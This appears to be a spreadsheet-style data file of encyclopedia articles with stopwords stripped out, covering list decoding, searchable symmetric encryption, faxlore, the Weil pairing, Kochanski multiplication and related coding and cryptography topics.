    <t>coding theory, list decoding alternative unique decoding error-correcting codes large error rates. notion proposed elias 1950s. main idea behind list decoding decoding algorithm instead outputting single possible message outputs list possibilities correct. this allows handling greater number errors allowed unique decoding. unique decoding model coding theory, constrained output single valid codeword received word could tolerate greater fraction errors. this resulted error-correction performance stochastic noise models (proposed shannon) adversarial noise model (considered richard hamming). since 90s, significant algorithmic progress coding theory community bridged gap. much progress based relaxed error-correction model called list decoding, wherein decoder outputs list codewords worst-case pathological error patterns actual transmitted codeword included output list. case typical error patterns though, decoder outputs unique single codeword, given received word, almost always case (however, known true codes). improvement significant error-correction performance doubles. this decoder confined half-the-minimum distance barrier. this model appealing list codewords certainly better giving notion list-decoding many interesting applications complexity theory. channel noise modeled plays crucial role governs rate reliable communication possible. there main schools thought modeling channel behavior: probabilistic noise model studied shannon channel noise modeled precisely sense probabilistic behavior channel well known probability occurrence many errors worst-case adversarial noise model considered hamming channel acts adversary arbitrarily corrupts codeword subject bound total number errors.the highlight list-decoding even adversarial noise conditions, possible achieve information-theoretic optimal trade-off rate fraction errors corrected. hence, sense like improving error-correction performance possible case weaker, stochastic noise model. mathematical formulation {\displaystyle {\mathcal {c}}} {\displaystyle (n,k,d)_{q}} error-correcting code; words, {\displaystyle {\mathcal {c}}} code length {\displaystyle dimension {\displaystyle minimum distance {\displaystyle alphabet {\displaystyle \sigma size {\displaystyle list-decoding problem formulated follows: input: received word {\displaystyle x\in \sigma ^{n}} error bound {\displaystyle output: list codewords {\displaystyle x_{1},x_{2},\ldots ,x_{m}\in {\mathcal {c}}} whose hamming distance {\displaystyle {\displaystyle motivation list decoding given received word {\displaystyle noisy version transmitted codeword {\displaystyle decoder tries output transmitted codeword placing codeword “nearest” received word. hamming distance codewords used metric finding nearest codeword, given received word decoder. {\displaystyle minimum hamming distance code {\displaystyle {\mathcal {c}}} exists codewords {\displaystyle c_{1}} {\displaystyle c_{2}} differ exactly {\displaystyle positions. now, case received word {\displaystyle equidistant codewords {\displaystyle c_{1}} {\displaystyle c_{2}} unambiguous decoding becomes impossible decoder cannot decide {\displaystyle c_{1}} {\displaystyle c_{2}} output original transmitted codeword. result, half-the minimum distance acts combinatorial barrier beyond unambiguous error-correction impossible, insist unique decoding. however, received words {\displaystyle considered occur worst-case looks hamming balls packed high-dimensional space, even error patterns {\displaystyle beyond half-the minimum distance, single codeword {\displaystyle within hamming distance {\displaystyle received word. this claim shown hold high probability random code picked natural ensemble case reed–solomon codes well studied quite ubiquitous real world applications. fact, shannon's proof capacity theorem q-ary symmetric channels viewed light claim random codes. under mandate list-decoding, worst-case errors, decoder allowed output small list codewords. with context specific side information, possible prune list recover original transmitted codeword. hence, general, seems stronger error-recovery model unique decoding. list-decoding potential polynomial-time list-decoding algorithm exist, need combinatorial guarantee hamming ball radius {\displaystyle around received word {\displaystyle (where {\displaystyle fraction errors terms block length {\displaystyle small number codewords. this list size clearly lower bound running time algorithm. hence, require list size polynomial block length {\displaystyle code. combinatorial consequence requirement imposes upper bound rate code. list decoding promises meet upper bound. shown non-constructively codes rate {\displaystyle exist list decoded fraction errors approaching {\displaystyle 1-r} quantity {\displaystyle 1-r} referred literature list-decoding capacity. this substantial gain compared unique decoding model potential correct twice many errors. naturally, need least fraction {\displaystyle transmitted symbols correct order recover message. this information-theoretic lower bound number correct symbols required perform decoding list decoding, potentially achieve information-theoretic limit. however, realize potential, need explicit codes (codes constructed polynomial time) efficient algorithms perform encoding decoding. l)-list-decodability error fraction {\displaystyle 0\leqslant p\leqslant integer {\displaystyle l\geqslant code {\displaystyle {\mathcal {c}}\subseteq \sigma ^{n}} said list decodable fraction {\displaystyle errors list size {\displaystyle {\displaystyle (p,l)} -list-decodable every {\displaystyle y\in \sigma ^{n}} number codewords {\displaystyle c\in within hamming distance {\displaystyle {\displaystyle {\displaystyle combinatorics list decoding relation list decodability code fundamental parameters minimum distance rate fairly well studied. shown every code list decoded using small lists beyond half minimum distance bound called johnson radius. this quite significant proves existence {\displaystyle (p,l)} -list-decodable codes good rate list-decoding radius much larger {\displaystyle {\tfrac {d}{2}}.} words, johnson bound rules possibility large number codewords hamming ball radius slightly greater {\displaystyle {\tfrac {d}{2}}} means possible correct errors list decoding. list-decoding capacity theorem (list-decoding capacity). {\displaystyle q\geqslant 2,0\leqslant p\leqslant 1-{\tfrac {1}{q}}} {\displaystyle \epsilon \geqslant following statements hold large enough block length {\displaystyle {\displaystyle r\leqslant 1-h_{q}(p)-\epsilon exists {\displaystyle (p,o(1/\epsilon -list decodable code. {\displaystyle r\geqslant 1-h_{q}(p)+\epsilon every {\displaystyle (p,l)} -list-decodable code {\displaystyle l=q^{\omega (n)}} where {\displaystyle h_{q}(p)=p\log _{q}(q-1)-p\log _{q}p-(1-p)\log _{q}(1-p)} {\displaystyle -ary entropy function defined {\displaystyle p\in (0,1)} extended continuity {\displaystyle [0,1].} what means rates approaching channel capacity, exists list decodable codes polynomial sized lists enabling efficient decoding algorithms whereas rates exceeding channel capacity, list size becomes exponential rules existence efficient decoding algorithms. proof list-decoding capacity significant exactly matches capacity {\displaystyle -ary symmetric channel {\displaystyle qsc_{p}} fact, term "list-decoding capacity" actually read capacity adversarial channel list decoding. also, proof list-decoding capacity important result points optimal trade-off rate code fraction errors corrected list decoding. sketch proof idea behind proof similar shannon's proof capacity binary symmetric channel {\displaystyle bsc_{p}} random code picked showing {\displaystyle (p,l)} -list-decodable high probability long rate {\displaystyle r\leqslant 1-h_{q}(p)-{\tfrac {1}{l}}.} rates exceeding quantity, shown list size {\displaystyle becomes super-polynomially large. "bad" event defined which, given received word {\displaystyle y\in [q]^{n}} {\displaystyle l+1} messages {\displaystyle m_{0},\ldots ,m_{l}\in [q]^{k},} happens {\displaystyle {\mathcal {c}}(m_{i})\in b(y,pn)} every {\displaystyle 0\leqslant i\leqslant {\displaystyle fraction errors wish correct {\displaystyle b(y,pn)} hamming ball radius {\displaystyle received word {\displaystyle center. now, probability codeword {\displaystyle {\mathcal {c}}(m_{i})} associated fixed message {\displaystyle m_{i}\in [q]^{k}} lies hamming ball {\displaystyle b(y,pn)} given {\displaystyle \left[c(m_{i})\in b(y,pn)\right]={\frac {\mathrm {vol} _{q}(y,pn)}{q^{n}}}\leqslant q^{-n(1-h_{q}(p))},} quantity {\displaystyle vol_{q}(y,pn)} volume hamming ball radius {\displaystyle received word {\displaystyle center. inequality relation follows upper bound volume hamming ball. quantity {\displaystyle q^{h_{q}(p)}} gives good estimate volume hamming ball radius {\displaystyle centered word {\displaystyle [q]^{n}.} another way, volume hamming ball translation invariant. continue proof sketch, conjure union bound probability theory tells probability event happening given {\displaystyle (y,m_{0},\dots ,m_{l})} upper bounded quantity {\displaystyle q^{-n(l+1)(1-h_{q}(p))}} with mind, probability "any" event happening shown less {\displaystyle show this, work possible received words {\displaystyle y\in [q]^{n}} every possible subset {\displaystyle messages {\displaystyle [q]^{k}.} turning proof part (ii), need show super-polynomially many codewords around every {\displaystyle y\in [q]^{n}} rate exceeds list-decoding capacity. need show {\displaystyle |{\mathcal {c}}\cap b(y,pn)|} super-polynomially large rate {\displaystyle r\geqslant 1-h_{q}(p)+\epsilon codeword {\displaystyle c\in {\mathcal {c}}} now, every {\displaystyle y\in [q]^{n}} picked random, {\displaystyle \pr[c\in b(y,pn)]=\pr[y\in b(c,pn)]} since hamming balls translation invariant. from definition volume hamming ball fact {\displaystyle chosen uniformly random {\displaystyle [q]^{n}} also {\displaystyle \pr[c\in b(y,pn)]=\pr[y\in b(c,pn)]={\frac {\mathrm {vol} (y,pn)}{q^{n}}}\geqslant q^{-n(1-h_{q}(p))-o(n)}} define indicator variable {\displaystyle x_{c}} otherwise {\displaystyle x_{c}={\begin{cases}1&amp;c\in b(y,pn)\\0&amp;{\text{otherwise}}\end{cases}}} taking expectation volume hamming ball {\displaystyle {\begin{aligned}e[|b(y,pn)|]&amp;=\sum _{c\in {\mathcal {c}}}e[x_{c}]\\[4pt]&amp;=\sum _{c\in {\mathcal {c}}}\pr[x_{c}=1]\\[4pt]&amp;\geqslant \sum q^{-n(1-h_{q}(p)+o(n))}\\[4pt]&amp;=\sum q^{n(r-1+h_{q}(p)+o(1))}\\[4pt]&amp;\geqslant q^{\omega (n)}\end{aligned}}} therefore, probabilistic method, shown rate exceeds list-decoding capacity, list size becomes super-polynomially large. this completes proof sketch list-decoding capacity. list-decoding algorithms period 1995 2007, coding theory community developed progressively efficient list-decoding algorithms. algorithms reed–solomon codes decode johnson radius {\displaystyle 1-{\sqrt {1-\delta exist {\displaystyle \delta normalised distance relative distance. however, reed-solomon codes, {\displaystyle \delta =1-r} means fraction {\displaystyle 1-{\sqrt {r}}} errors corrected. some prominent list-decoding algorithms following: sudan first known non-trivial list-decoding algorithm reed–solomon codes achieved efficient list decoding {\displaystyle 1-{\sqrt {2r}}} errors developed madhu sudan. guruswami–sudan improvement algorithm list decoding reed–solomon codes {\displaystyle 1-{\sqrt {r}}} errors madhu sudan doctoral student venkatesan guruswami. parvaresh–vardy breakthrough paper, farzad parvaresh alexander vardy presented codes list decoded beyond {\displaystyle 1-{\sqrt {r}}} radius rates {\displaystyle their codes variants reed-solomon codes obtained evaluating {\displaystyle m\geqslant correlated polynomials instead {\displaystyle case usual reed-solomon codes. guruswami–rudra another breakthrough, venkatesan guruswami atri rudra give explicit codes achieve list-decoding capacity, list decoded radius {\displaystyle 1-r-\epsilon {\displaystyle \epsilon words, error-correction optimal redundancy. this answered question open years. this work invited research highlights section communications (which “devoted important research results published computer science recent years”) mentioned article titled “coding computing join forces” 2007 issue science magazine. codes given called folded reed-solomon codes nothing plain reed-solomon codes viewed code larger alphabet careful bundling codeword symbols.because ubiquity nice algebraic properties possess, list-decoding algorithms reed–solomon codes main focus researchers. list-decoding problem reed–solomon codes formulated follows: input: {\displaystyle [n,k+1]_{q}} reed-solomon code, given pair {\displaystyle (\alpha _{i},y_{i})} {\displaystyle 1\leq i\leq {\displaystyle y_{i}} {\displaystyle received word {\displaystyle \alpha _{i}} distinct points finite field {\displaystyle f_{q}} error parameter {\displaystyle e=n-t} output: goal find polynomials {\displaystyle p(x)\in f_{q}[x]} degree {\displaystyle message length {\displaystyle p(\alpha _{i})=y_{i}} least {\displaystyle values {\displaystyle here, would like {\displaystyle small possible greater number errors tolerated. with formulation, general structure list-decoding algorithms reed-solomon codes follows: step (interpolation) find non-zero bivariate polynomial {\displaystyle q(x,y)} {\displaystyle q(\alpha _{i},y_{i})=0} {\displaystyle 1\leq i\leq step (root finding/factorization) output degree {\displaystyle polynomials {\displaystyle p(x)} {\displaystyle y-p(x)} factor {\displaystyle q(x,y)} i.e. {\displaystyle q(x,p(x))=0} polynomials, check {\displaystyle p(\alpha _{i})=y_{i}} least {\displaystyle values {\displaystyle i\in [n]} include polynomial {\displaystyle p(x)} output list. given fact bivariate polynomials factored efficiently, algorithm runs polynomial time. applications complexity theory cryptography algorithms developed list decoding several interesting code families found interesting applications computational complexity field cryptography. following sample list applications outside coding theory: construction hard-core predicates one-way permutations. predicting witnesses np-search problems. amplifying hardness boolean functions. average case hardness permanent random matrices. extractors pseudorandom generators. efficient traitor tracing. external links survey list decoding madhu sudan notes course taught madhu sudan notes course taught luca trevisan notes course taught venkatesan guruswami notes course taught atri rudra elias, "list decoding noisy channels," technical report 335, research laboratory electronics, mit, 1957. elias, "error-correcting codes list decoding," ieee transactions information theory, vol. 5–12, 1991. wozencraft, "list decoding," quarterly progress report, research laboratory electronics, mit, vol. 90–95, 1958. venkatesan guruswami's thesis algorithmic results list decoding folded reed–solomon code</t>
  </si>
  <si>
    <t>Festival of Code</t>
  </si>
  <si>
    <t>festival code yearly event organized young rewired state motivate young coders "build something awesome". festival attracted sponsors ranging office google sap.in 2016, announced year's festival code would postponed 2017, event occur 2017 subsequent years. format festival code occurred five days, usually last week july first week august. between monday thursday, participants took part festival local centres across plus international centres kosovo bern. afterwards, friday sunday, participants travel location within present work week. 2015, weekend held birmingham's international convention centre, whereas 2014 event plymouth university. participants 2009, event first started, participants attending weekend google's london offices. this number rose roughly thousand young people participating across country, foreign centres. also managed increase takeup event young female coders first event 2009, 2014. also young rewired state references external links official website young rewired state rewired state hyperlocal</t>
  </si>
  <si>
    <t>Bach's algorithm</t>
  </si>
  <si>
    <t>bach's algorithm probabilistic polynomial time algorithm generating random numbers along factorizations, named discoverer, eric bach. interest algorithm known efficiently factors numbers, straightforward method, namely generating random number factoring impractical. algorithm performs, expectation, o(log primality tests. simpler, less efficient algorithm (performing, expectation, {\displaystyle o(\log ^{2}n)} primality tests), adam kalai. overview bach's algorithm produces number {\displaystyle uniformly random range {\displaystyle n/2&lt;x\leq (for given input {\displaystyle along factorization. picking prime number {\displaystyle exponent {\displaystyle {\displaystyle p^{a}\leq according certain distribution. algorithm recursively generates number {\displaystyle range {\displaystyle m/2&lt;y\leq {\displaystyle m=n/p^{a}} along factorization {\displaystyle sets {\displaystyle x=p^{a}y} appends {\displaystyle p^{a}} factorization {\displaystyle produce factorization {\displaystyle this gives {\displaystyle logarithmic distribution desired range; rejection sampling used uniform distribution. references further reading bach, eric. analytic methods analysis design number-theoretic algorithms, press, 1984. chapter "generation random factorizations", part available online here.</t>
  </si>
  <si>
    <t>Searchable symmetric encryption</t>
  </si>
  <si>
    <t>searchable symmetric encryption (sse) form encryption allows efficiently search collection encrypted documents files without ability decrypt them. used outsource files untrusted cloud storage server without ever revealing files clear preserving server's ability search them. description searchable symmetric encryption scheme symmetric-key encryption scheme encrypts collection documents {\displaystyle \mathbf =(\mathrm {d_{1}} ,\dots ,\mathrm {d_{n}} document {\displaystyle \mathrm {d_{i}} \subseteq \mathbb viewed keywords keyword space {\displaystyle \mathbb given encryption {\displaystyle keyword {\displaystyle w\in \mathbb generate search token {\displaystyle encrypted data collection searched {\displaystyle result search subset encrypted documents contain keyword {\displaystyle static static scheme consists three algorithms {\displaystyle {\mathsf {sse=(setup,token,search)}}} work follows: {\displaystyle {\mathsf {setup}}} takes input security parameter {\displaystyle document collection {\displaystyle \mathbf outputs symmetric {\displaystyle encrypted document collection {\displaystyle \mathbf {ed} {\displaystyle {\mathsf {token}}} takes input secret {\displaystyle keyword {\displaystyle outputs search token {\displaystyle {\displaystyle {\mathsf {search}}} takes input encrypted document collection {\displaystyle \mathbf {ed} search token {\displaystyle outputs encrypted documents {\displaystyle \mathbf \subseteq \mathbf {ed} static scheme used client untrusted server follows. client encrypts data collection using {\displaystyle {\mathsf {setup}}} algorithm returns secret {\displaystyle encrypted document collection {\displaystyle \mathbf {ed} client keeps {\displaystyle secret sends {\displaystyle \mathbf {ed} untrusted server. search keyword {\displaystyle client runs {\displaystyle {\mathsf {searchtoken}}} algorithm {\displaystyle generate search token {\displaystyle sends server. server runs search {\displaystyle \mathbf {ed} {\displaystyle returns resulting encrypted documents back server. dynamic dynamic scheme supports, addition search, insertion deletion documents. dynamic scheme consists seven algorithms {\displaystyle {\mathsf {sse=(setup,token,search,inserttoken,insert,deletetoken,delete)}}} {\displaystyle {\mathsf {setup}}} {\displaystyle {\mathsf {token}}} {\displaystyle {\mathsf {search}}} static case remaining algorithms work follows: {\displaystyle {\mathsf {inserttoken}}} takes input secret {\displaystyle document {\displaystyle \mathrm {d_{n+1}} outputs insert token {\displaystyle itk} {\displaystyle {\mathsf {insert}}} takes input encrypted document collection insert token {\displaystyle itk} outputs updated encrypted document collection {\displaystyle \mathbf {ed'} {\displaystyle {\mathsf {deletetoken}}} takes input secret {\displaystyle document identifier {\displaystyle outputs delete token {\displaystyle dtk} {\displaystyle {\mathsf {delete}}} takes input encrypted data collection {\displaystyle \mathrm {edc} delete token {\displaystyle dtk} outputs updated encrypted data collection {\displaystyle \mathbf {ed'} document {\displaystyle \mathrm {d_{n+1}} client runs {\displaystyle {\mathsf {inserttoken}}} {\displaystyle {\displaystyle \mathrm {d_{n+1}} generate insert token {\displaystyle itk} sends server. server runs {\displaystyle {\mathsf {insert}}} {\displaystyle \mathbf {ed} {\displaystyle itk} stores updated encrypted document collection. delete document identifier {\displaystyle client runs {\displaystyle {\mathsf {deletetoken}}} algorithm {\displaystyle {\displaystyle generate delete token {\displaystyle dtk} sends server. server runs {\displaystyle {\mathsf {delete}}} {\displaystyle \mathbf {ed} {\displaystyle dtk} stores updated encrypted document collection. scheme support {\displaystyle {\mathsf {deletetoken}}} {\displaystyle {\mathsf {delete}}} called semi-dynamic. history searchable symmetric encryption problem searching encrypted data considered song, wagner perrig though previous work oblivious goldreich ostrovsky could used theory address problem. this work proposed scheme search algorithm runs time {\displaystyle o(s)} {\displaystyle s=|\mathbf chang mitzenmacher gave constructions search algorithms time {\displaystyle o(n)} {\displaystyle number documents. curtmola, garay, kamara ostrovsky later proposed static constructions {\displaystyle o(\mathrm {opt} search time, {\displaystyle \mathrm {opt} number documents contain {\displaystyle optimal. this work also proposed semi-dynamic construction {\displaystyle o(\mathrm {opt} \cdot \log(u))} search time, {\displaystyle number updates. optimal dynamic construction later proposed kamara, papamanthou roeder.goh chang mitzenmacher proposed security definitions sse. these strengthened extended curtmola, garay, kamara ostrovsky proposed notion adaptive security sse. this work also first observe leakage formally capture part security definition. leakage formalized generalized chase kamara. islam, kuzu kantarcioglu described first leakage attack.all previously mentioned constructions support single keyword search. cash, jarecki, jutla, krawczyk, rosu steiner proposed scheme supports conjunctive search sub-linear time {\displaystyle construction also extended support disjunctive boolean searches expressed searchable normal form (snf) sub-linear time. time, pappas, krell, kolesnikov, malkin, choi, george, keromytis bellovin described construction supports conjunctive disjunctive boolean searches sub-linear time. security schemes designed guarantee untrusted server cannot learn partial information documents search queries beyond well-defined reasonable leakage. leakage scheme formally described using leakage profile consists several leakage patterns. constructions attempt minimize leakage achieving best possible search efficiency. security analyzed several adversarial models common are: persistent model, adversary given encrypted data collection transcript operations executed collection; snapshot model, adversary given encrypted data collection (but possibly operation). security persistent model persistent model, schemes achieve wide variety leakage profiles. common leakage profile static schemes achieve single keyword search optimal time {\displaystyle \lambda _{\mathrm {opt} reveals number documents collection, size document collection, query repeated encrypted documents match search query. known, however, construct schemes leak considerably less additional cost search time storage.when considering dynamic schemes, state-of-the-art constructions optimal time search leakage profiles guarantee forward privacy means inserts cannot correlated past search queries. security snapshot model snapshot model, efficient dynamic schemes leakage beyond number documents size collection constructed. when using construction secure snapshot model carefully consider scheme deployed systems might cache previous search queries. cryptanalysis leakage profile describes leakage scheme says nothing whether leakage exploited not. cryptanalysis therefore used better understand real-world security leakage profile. there wide variety attacks working different adversarial models, based variety assumptions attacking different leakage profiles. also homomorphic encryption oblivious structured encryption deterministic encryption references</t>
  </si>
  <si>
    <t>Faxlore</t>
  </si>
  <si>
    <t>faxlore sort folklore: humorous texts, folk poetry, folk art, urban legends circulated, word mouth, machine. xeroxlore photocopylore similar material circulated photocopying; compare samizdat soviet-bloc countries. first term xeroxlore michael preston's essay "xerox-lore", 1974. "photocopylore" perhaps frequently encountered name phenomenon now, trademark concerns involving xerox corporation. first term came dictionary english folklore jacqueline simpson steve roud. material circulated faxlore achtung! alles turisten nonteknischen lookenpeepers! maschine-kontrol nicht gefingerpoken mittengraben! oderwise easy schnappen springenwerk, blowenfusen poppencorken spitzensparksen. maschine diggen experten only! nicht gewerken dummkopfen. rubbernecken sightseeren keepen cottonpicken händer pockets. relaxen watschen blinkenlights. some faxlore relatively harmless. cartoons jokes often circulate faxlore, poor graphic quality becoming worse person resends joke next recipient. because faxlore xeroxlore (mis)appropriation technology owned employer, much humorous faxlore mildly subversive workplace values. like email chain letters, office technology given life various forms practical jokes, urban legends, folklore. items often office-related, spoof agenda meetings, spurious descriptions ridiculous training programs staff allegedly required attend, names whited replaced someone office, making joke particular person, details altered making item topical.the semi-traditional lists reasons "why cucumber better man" "why beer better woman" often circulate faxlore, well known mock german variations "blinkenlights" poster. another commonly circulated text contains ethnic humor; typical version goes: heaven police british, lovers french, mechanics german, chefs italian, organized swiss. hell police german, lovers swiss, mechanics french, chefs british, organized italians. materials sort existed beginnings duplicating technologies. world blueprints exist drawings female nudes body parts labeled parts airplanes. with widespread adoption photocopying, amateur duplication sort material became available much larger social base. cartoons amateur materials distributed workplace, usually violation managerial restrictions office supplies, often disregard copyright law.later, early 1990s, widespread adoption telecopiers made possible duplicate materials remotely. machine duplicate materials also changed emphases subjects; various alarms urban legends propagated distant readers telephone lines. this somewhat supplanted email technology became widely used embedded culture; sort urban legends circulated likely appear email hoaxes. specific computer related alarms subject virus hoaxes; email makes forwarding texts relatively easy, frightening nature revelation makes seem important pass along, despite doubts sender might have. faxlore urban legends other sorts faxlore serious consequences. number notorious urban legends circulated faxlore. notorious "blue star acid" hoax well known example. "lights out" hoax, claimed people driving dark headlights might gang members, flashed headlights drivers might marked murder part gang initiation, another hoax widely circulated faxlore. poor graphic quality frequently re-sent faxes, often made appear originated police department distant city, made hoaxes seem credible. legal aspects united states, collections supposedly sinister symbols circulated among school administrators police departments; 1980s symbols frequently alleged "satanic symbols", 1990s alleged "gang symbols". political religious symbols, like peace symbol, star david, rosary, ankh, pentagram mingled cryptic fanciful symbols faxed recirculated sheets, entire collection condemned.on authority anonymous, hard-to-trace, impossible-to-cross-examine sources, school administrators sometimes acted wearing stars david similar symbols minority religions. typically, compiler author given collection symbols, though frightening descriptions often given "secret meaning." number civil liberties lawsuits filed actions taken school administrators took anonymous sources seriously.a similar claim procter gamble logo "satanic symbol" linked 1980s activity several amway distributors, amway procter gamble's competitors; hoax spread fax, photocopier, later voice mail email. another occasional hoax claims clothing memorabilia various universities sports teams "gang symbols". growing obsolescence with rise internet, media world wide web, email, instant messaging, social networking sites available quickly widely spread sort material formerly circulated faxlore. hoax warnings things dire terrible computer viruses still occasionally circulate, carry tradition bogus cautionary tale used circulate faxlore, known copypasta altered compound common computer functions copy paste). also junk meme references citations academic sources brunvand, truth never stands good story (2000, univ. illinois: isbn 0-252-07004-6) collecting examples choking doberman (norton, 1984; isbn 0-393-30321-7) curses! broiled again! (horton, 1989; isbn 0-393-02710-4) collecting examples, inc. "blue star acid" dundes, alan pagter, carl work hard shall rewarded: urban folklore paperwork empire. (rev. ed., wayne state univ. 1992; isbn 0-8143-2432-0) when you're your alligators... more urban folklore paperwork empire (wayne state univ. 1997; isbn 0-8143-1867-3) never teach sing: still more urban folklore paperwork empire (wayne state univ. 1991; isbn 0-8143-2358-8) sometimes dragon wins: more urban folklore paperwork empire (syracuse, 1997; isbn 0-8156-0371-1) ellis, bill: raising devil: satanism, religions, media (univ. kentucky, 2000; isbn 0-8131-2170-1) hatch, mary jones, michael owen: "photocopylore work: aesthetics, collective creativity social construction organizations", culture organization, vol. (july 1997) michael, nancy. "censure photocopylore display." journal folklore research, vol. (may–august 1995). preston, michael "traditional humor machine: 'all kind'", western folklore, vol. (april 1994) "xeroxlore", american folklore: encyclopedia, brunvand, editor chief. (garland, 1996; isbn 0-8153-3350-1) analysis emery, david: trademark beast, byline june 1998, accessed nov, 2007 procter gamble logo hoax bunch, michael: "technology aided spread terrifying hoax", diego union-tribune, oct. 1993 "lights out" gang initiation legend spreads copier. hofstadter, douglas: beau marot: praise music language (isbn 0-465-08645-4) contains linguistic discussion blinkenlights text legal chalifoux caney independent school district, f.supp. (s.d. tex. 1997) school board rule forbidding wearing rosary necklace, claimed "gang symbol", struck court. jeglin jacinto unified school district, f.supp. 1459 (c.d. cal. 1993) school board dress code forbidding wearing sports logos, claimed "gang symbols", partially struck court. roberts, kesler littrell, elizabeth weber, gerald plaintiff's memorandum support motion summary judgment tillman gwinnett county school district, (n.d. ga., case 1:04-cv-01180-bbm). apr. 2005, accessed nov. 2007. brief filed behalf american civil liberties union foundation georgia. shows school administrators relying anonymous printouts rumors condemn, among things, university north carolina logos clothing, patch reading españa, "gang symbols". external links blue star acid snopes.com. "lights out" hoax snopes.com "xeroxlore" everything2.com. "mississippi high school bars student's star david" (jewish news weekly, august 1999) archive viral documents textfiles.com</t>
  </si>
  <si>
    <t>Weil pairing</t>
  </si>
  <si>
    <t>mathematics, weil pairing pairing (bilinear form, though multiplicative notation) points order dividing elliptic curve taking values roots unity. more generally similar weil pairing points order abelian variety dual. introduced andré weil (1940) jacobians curves, gave abstract algebraic definition; corresponding results elliptic functions known, expressed simply weierstrass sigma function. formulation choose elliptic curve defined field integer require coprime char(k) char(k) contains primitive root unity. then n-torsion {\displaystyle e({\overline {k}})} known cartesian product cyclic groups order weil pairing produces n-th root unity {\displaystyle w(p,q)\in _{n}} means kummer theory, points {\displaystyle p,q\in e(k)[n]} {\displaystyle e(k)[n]=\{t\in e(k)\mid n\cdot t=o\}} {\displaystyle _{n}=\{x\in k\mid x^{n}=1\}} down-to-earth construction weil pairing follows. choose function function field algebraic closure divisor {\displaystyle \mathrm {div} (f)=\sum _{0\leq k&lt;n}[p+k\cdot q]-\sum _{0\leq k&lt;n}[k\cdot q].} simple zero point simple pole point points distinct. then well-defined multiplication constant. translation construction divisor, function constant. therefore define {\displaystyle w(p,q):={\frac {g}{f}}} shall n-th root unity translating times must give with definition shown alternating bilinear, giving rise non-degenerate pairing n-torsion. weil pairing extend pairing torsion points (the direct limit n-torsion points) pairings different same. however together give pairing tℓ(e) tℓ(e) tℓ(μ) tate module tℓ(e) elliptic curve (the inverse limit ℓn-torsion points) tate module tℓ(μ) multiplicative group (the inverse limit roots unity). generalisation abelian varieties abelian varieties algebraically closed field weil pairing nondegenerate pairing {\displaystyle a[n]\times a^{\vee }[n]\longrightarrow _{n}} prime characteristic here {\displaystyle a^{\vee denotes dual abelian variety this so-called weil pairing higher dimensions. equipped polarisation {\displaystyle \lambda :a\longrightarrow a^{\vee ,then composition gives (possibly degenerate) pairing {\displaystyle a[n]\times a[n]\longrightarrow _{n}.} projective, nonsingular curve genus jacobian, theta-divisor induces principal polarisation particular case happens isomorphism (see autoduality jacobians). hence, composing weil pairing polarisation gives nondegenerate pairing {\displaystyle j[n]\times j[n]\longrightarrow _{n}} prime characteristic case elliptic curves, explicit formulae pairing given terms divisors applications pairing used number theory algebraic geometry, also applied elliptic curve cryptography identity based encryption. also tate pairing pairing-based cryptography boneh–franklin scheme homomorphic signatures network coding references weil, andré (1940), "sur fonctions algébriques corps constantes fini", comptes rendus l'académie sciences, 210: 592–594, 0002863 external links weil pairing elliptic curves (pdf)</t>
  </si>
  <si>
    <t>Kochanski multiplication</t>
  </si>
  <si>
    <t>kochanski multiplication algorithm allows modular arithmetic (multiplication operations based exponentiation) performed efficiently modulus large (typically several hundred bits). this particular application number theory cryptography: example, cryptosystem diffie–hellman exchange. common implementing large-integer multiplication hardware express multiplier binary enumerate bits, time, starting significant bit, perform following operations accumulator: double contents accumulator accumulator stores numbers binary, usually case, simple "shift left" requires actual computation). current multiplier multiplicand accumulator; nothing.for n-bit multiplier, take clock cycles (where cycle either shift shift-and-add). convert algorithm modular multiplication, modulus necessary subtract conditionally stage: double contents accumulator. result greater equal subtract (equivalently, subtract accumulator store result back accumulator non-negative). current multiplier multiplicand accumulator; nothing. result addition greater equal subtract addition took place, nothing.this algorithm works. however, critically dependent speed addition. addition long integers suffers problem carries propagated right left final result known process completed. carry propagation speeded carry look-ahead logic, still makes addition much slower needs (for 512-bit addition, addition carry look-ahead times slower addition without carries all). non-modular multiplication make carry-save adders, save time storing carries digit position using later: example, computing 111111111111+000000000010 111111111121 instead waiting carry propagate whole number yield true binary value 1000000000001. that final propagation still done yield binary result needs done multiplication. unfortunately modular multiplication method outlined needs know magnitude accumulated value every step, order decide whether subtract example, needs know whether value accumulator greater 1000000000000, carry-save representation 111111111121 useless needs converted true binary value comparison made. therefore seems either speed carry-save modular multiplication, both. outline algorithm principle kochanski algorithm making guesses whether subtracted, based significant bits carry-save value accumulator. such guess wrong time, since knowing whether latent carries less significant digits (which examined) might invalidate result comparison. thus: subtraction made required. case result accumulator greater (although algorithm know yet), next shift left, need subtracted accumulator. subtraction made required. case result accumulator less (although algorithm know yet), next shift left, even need added back accumulator make positive again.what happening essentially race errors result wrong guesses, double every shift left, corrections made adding subtracting multiples based guess errors turns examining significant bits accumulator sufficient keep errors within bounds values need added accumulator −2r, +2r, generated instantaneously simple shifts negations. complete modular multiplication, true binary result operation evaluated possible additional addition subtraction needed result carries discovered; cost extra step small amortized hundreds shift-and-add steps dominate overall cost multiplication. alternatives brickell published similar algorithm requires greater complexity electronics digit accumulator. montgomery multiplication alternative algorithm processes multiplier "backwards" (least significant digit first) uses least significant digit accumulator control whether modulus added. this avoids need carries propagate. however, algorithm impractical single modular multiplications, since three additional montgomery steps performed convert operands special form processing convert result back conventional binary end. references kochanski, martin. "creating fap4 chip". archived original 2018-05-09. informal explanation motivation algorithm, details actual hardware implementation.</t>
  </si>
  <si>
    <t>Phi-hiding assumption</t>
  </si>
  <si>
    <t>phi-hiding assumption φ-hiding assumption assumption difficulty finding small factors φ(m) number whose factorization unknown, euler's totient function. security many modern cryptosystems comes perceived difficulty certain problems. since problem still unresolved, cryptographers cannot sure computationally intractable problems exist. cryptographers thus make assumptions problems hard. commonly believed product large primes, calculating φ(m) currently computationally infeasible; assumption required security cryptosystem. φ-hiding assumption stronger assumption, namely small primes exactly divides φ(m), polynomial-time algorithm distinguish primes divides φ(m) probability significantly greater one-half. this assumption first stated 1999 paper computationally private information retrieval polylogarithmic communication, used private information retrieval scheme. applications phi-hiding assumption found applications construction cryptographic primitives. some constructions include: computationally private information retrieval polylogarithmic communication (1999) efficient private bidding auctions oblivious third party (1999) single-database private information retrieval constant communication rate (2005) password authenticated exchange using hidden smooth subgroups (2005) references</t>
  </si>
  <si>
    <t>Security Protocols Open Repository</t>
  </si>
  <si>
